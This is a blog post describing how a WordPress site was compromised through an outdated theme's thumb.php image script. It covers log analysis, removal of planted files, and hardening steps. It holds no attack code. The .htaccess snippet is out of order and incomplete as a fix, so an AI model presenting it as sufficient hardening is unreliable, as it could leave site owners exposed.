One of the WordPress site that I manage was recently hacked. Yes hacked! I’m going to explain the main reason on how my site was easily defenseless against the attacker.
I used the Woo Canvas theme and had already taken all the WordPress security measures to protect my site but still the hacker was successful in hacking the main page. How did this happen? Is WordPress safe? How do I avoid it? Is it going to happen again? What if it happens again? How do I prevent it from happening again? Tons of questions started in my mind.
Also, being a vivid Web Dev Geek myself, the other part of my brain started asking questions like how did he break in? I need to meet this guy, what technique did the hacker use?
So here’s what I did:
- Looked at the server logs
- Found out where more requests were coming from
- Found the vulnerability in my theme file
- Find and remove any suspicious files
#1. Look at the server logs
This is the most common thing anyone should do when the site gets hacked or hijacked. Where do you find it you ask? Simple, it should be available in the control panel. Or if you are using an FTP client, simple search for a file called error_log and open with notepad
When I looked at the logs I found out there were many unnecessary requests made to the thumb.php file from a particular IP. Since the hack happened a few minutes ago, I was able to easily identify who the real culprit was by seeing the logs.
#2. Found a pattern
Multiple accesses to my /wp-content/themes/headlines/thumb.php file. I wasn’t really sure why there were so many requests to the same file but was really surprised.
Then I looked the file access time. This time coincidentally matched the same time when the site was hacked. SO I Googled my find “thumb.php exploit” to find About 1,360,000 results. When I read through the list, I got to know that I wasn’t the first one to be exploited. It was already done – A lot of times, to a lot of websites.
#3 Concluded that My old theme file was screwing me
Yes an old theme file I had was used to screw me over. I was under the impression that the user was using the latest woo canvas theme’s thumb.php file but it wasn’t the case. The hacker somehow managed to find the inactive but still available in the wp-contact/themes folder theme.
#4 Finding any left over files by the hacker
Hackers usually do leave some piece of code behind, so that can whop the sites again. So make sure to compare your WordPress installation files code with the real file. (http://phpxref.ftwr.co.uk/wordpress was extremely helpful)… Looked into the cache folder to find 2 weird files – 1. externl_28ajssjlaax.php and 2.wsob.php file. Deleted it.
How to fix it and make sure this never happens again?
There are 3 main things that need to be done here.
- Update the Thumb.php or Timthumb.php file
- Remove the sites from thumb.php
- Add a .htaccess file to your cache directory
#1 Update the file
The original source repository for thumb.php is located on the code.google.com website.Visit the site and update\replace the thumb.php or timthumb.php file with the new one.
#2. Remove sites
//external domains that are allowed to be displayed on your website
$allowedSites = array();
These are used to fetch and cache images from external sites.
#3. Add an .htaccess to the cache directory
Now that we’ve updated and patched the thumb.php or timthumb.php file we’d probably need to forbid anyone ever from accessing or stashing something in your cache folder.
AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgi
Upload a new .htaccess file to the cache directory with the following code
Oh and the hacker claims himself to be “Hmei7” – would love to meet him though :). I’m probably going to send an email out to all my WordPress clients to let them know to update their thumb.php files and follow the same steps I used. Being cautious is better than being hacked cautiously Hail WordPress!